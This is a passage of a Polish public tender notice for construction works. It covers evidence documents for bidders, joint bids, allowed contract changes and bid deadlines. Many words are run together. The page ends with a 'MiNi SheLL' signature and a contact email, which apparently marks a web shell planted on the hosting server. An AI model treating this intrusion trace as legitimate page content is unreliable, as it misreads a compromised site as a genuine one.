budowlane lub usługi, do realizacji których te zdolności<br/>są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty<br/>wezwiewykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, niekrótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych<br/>środkówdowodowych:1) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej<br/>Ewidencji iInformacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy,<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają<br/>wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia, w<br/>szczególnościodpowiedzialnych za świadczenie usług, kontrole jakości lub kierowanie robotami<br/>budowlanymi, wraz zinformacją na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenianiezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nieczynności oraz informacją o podstawie dysponowania tymi osobami PODMIOTY<br/>ZAGRANICZNE:1)Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium<br/>Rzeczypospolitej Polskiej,zamiast dokumentu, o których mowa w ust. 1pkt 2 składa dokument lub<br/>dokumenty wystawione wkraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające odpowiednio, żenie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, o<br/>którym mowa powyżej, powinienbyć wystawiony nie wcześniej niż 3 miesięcy przed upływem terminu<br/>składania ofert.2) Jeżeli w kraju,w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie<br/>wydaje się dokumentów, o którychmowa w ust. 1 pkt 2, zastępuje się je w całości lub części<br/>dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób<br/>uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym,<br/>administracyjnym albo organem samorząduzawodowego lub gospodarczego właściwym ze względu na<br/>siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> WYKAZ PODMIOTOWYCH ŚRODKÓW DOWODOWYCH1) DOKUMENTYSKŁADANE RAZEM<br/>Z OFERTĄ1. Oferta składana jest pod rygorem nieważności w formieelektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.2.Wykonawca<br/>dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunkówudziału w<br/>postępowaniu w zakresie wskazanym w SWZ. Oświadczenie to stanowi dowódpotwierdzający<br/>brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na<br/>dzieńskładania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe,<br/>wskazane wrozdziale II podrozdziale 8 pkt 2 SWZ.3. Oświadczenie składane jest pod rygorem<br/>nieważności wformie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym,<br/>lub podpisemosobistym.WYKONAWCA JEST ZOBOWIĄZANY ZŁOŻYĆ TAKŻE WRAZ Z<br/>OFERTĄ: 1)OŚWIADZCENIE podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tegopodmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu; (<br/>jeżeli dotyczy)2)OŚWIADCZENIE wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia z którego wynika,które roboty budowlane lub dostawy lub usługi wykonają<br/>poszczególni wykonawcy ( jeżelidotyczy)OŚWIADCZENIE potwierdzające brak podstaw<br/>wykluczenia podwykonawcy, na którychzasobach wykonawca nie polega przy wykazywaniu<br/>spełnienia warunków udziału w postępowaniu (jeżeli dotyczy)DO OFERTY WYKONAWCA<br/>ZAŁĄCZA RÓWNIEŻ: 1) ZOBOWIĄZANIE podmiotuudostępniającego zasoby ( jeżeli dotyczy)2)<br/>dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli<br/>dotyczy);3) WYKAZ ROZWIĄZAŃ RÓWNOWAŻNYCH wykonawca załącza do oferty wykaz<br/>rozwiązań równoważnych z jego opisem lub normami (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia zgodnie z art. 58 ustawyPzp.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego: •<br/>Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego.• Wszelkakorespondencja będzie<br/>prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.• jeżelioferta Wykonawców, o<br/>których mowa w pkt c, zostanie wybrana, zamawiający zastrzega możliwość żądania przed<br/>zawarciem umowy w sprawie zamówienia publicznego, przedłożenia umowy regulującej<br/>współpracę tych Wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.przesunięcia terminu wykonania przedmiotu umowy :1.1.z uwagi na niekorzystne<br/>warunkiatmosferyczne uniemożliwiające wykonywanie prac (na okoliczność wystąpienia<br/>wymienionegofaktu Wykonawca sporządzi notatkę służbową, która wymaga potwierdzenia<br/>przez InspektoraNadzoru i zwróci się do zamawiającego z pisemnym wnioskiem o przesuniecie<br/>terminuwykonania przedmiotu umowy podając przyczynę i proponowany termin zakończenia<br/>prac, którynie może być dłuższy od faktycznego okresu przerwy lub postoju)2. przypadku<br/>zaistnieniaokoliczności niezależnych od Wykonawcy, w szczególności z powodu:a) istnienia<br/>braków wdokumentacji o czas niezbędny na ich uzupełnienie, b) konieczności wykonywania<br/>części robótw inny sposób niż założony w projekcie. Wynagrodzenie dla robót zamiennych<br/>zostanieokreślone na podstawie stawek i cen jednostkowych podanych w oparciu o bieżącą<br/>wycenę tychrobót, c) opóźnienia dostępu do placu budowy,d) w przypadku konieczności<br/>wykonania robótdodatkowych albo innych robót, które są niezbędne do dokończenia realizacji<br/>przedmiotowegozamówienia,e) wstrzymania robót przez organy administracji publicznej,f)<br/>działania siły wyższej(np. klęski żywiołowe, strajki lokalne lub generalne) mające bezpośredni<br/>wpływ na terminowośćwykonywanych robót),g) zawieszenia robót przez Zamawiającego .3.<br/>rezygnacji z części pracy -w razie zaistnienia okoliczności, w których zbędne będzie wykonanie<br/>danej części zamówienia,wraz ze związanym z tym obniżeniem wynagrodzenia (w takim<br/>przypadku Wykonawcaprzygotuje przy udziale Zamawiającego protokół sporządzony na dzień<br/>rezygnacji, w którymStrony określą prace, z wykonania których Zamawiający zrezygnował oraz<br/>wysokość kwoty, októrą zostanie obniżone wynagrodzenie),4. konieczności wykonania robót<br/>zamiennych robotyzamienne będą mogły wystąpić wówczas, gdy część robót opisanych w<br/>dokumentacji nie będziewykonywana zaś strony uzgodnią w tym samym zakresie wartościowym<br/>wykonanie innych,koniecznych robót.5. zmiany sposobu realizacji zamówienia - wynikającej ze<br/>zmian wobowiązujących przepisach prawa bądź wytycznych mających wpływ na realizację<br/>przedmiotuumowy,6. konieczności wykonywania robót nieprzewidzianych i niewycenionych w<br/>ofercie,7.zmiana osób wskazanych w umowie pełniących kontrolę i nadzór nad<br/>realizowanymzamówieniema) zmiany kierownika budowyb) zmiany inspektora<br/>nadzoruZamawiający z własnejinicjatywy proponuje zmianę inspektora nadzoru w następujących<br/>przypadkach :- śmierci,choroby lub innych zdarzeń losowych inspektora nadzoru,-<br/>niewywiązywania się przezinspektora nadzoru z obowiązków wynikających z umowy,-<br/>konieczności zmiany z innychprzyczyn niezależnych od Zamawiającego-np. rezygnacja, itp.<br/>Wykonawca może żądać odZamawiającego dokonania zmiany inspektora nadzoru wskazanego<br/>w umowie, jeżeli uzna, żeinspektor nadzoru nie wykonuje obowiązków wynikających z umowy.<br/>W przypadku dokonaniaw/w zmian - nowy inspektor nadzoru musi spełniać wymagania<br/>określone w SpecyfikacjiIstotnych Warunków Zamówienia. 8.innych istotnych postanowień<br/>umowy - gdy ich zmiana jestkonieczna w związku ze zmianą przepisów prawa powszechnie<br/>obowiązującego w zakresiemającym wpływ na realizacje przedmiotu zamówienia , w tym<br/>również zmiany stawki podatkuVAT9.wartości zamówienia – łączna wartość zmian jest mniejsza<br/>niż progi unijne oraz jest niższa niż 15 % wartości pierwotnej umowy, a zmiany te nie powodują<br/>zmiany ogólnego charakteru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zp.powiat.przemysl.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-15 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com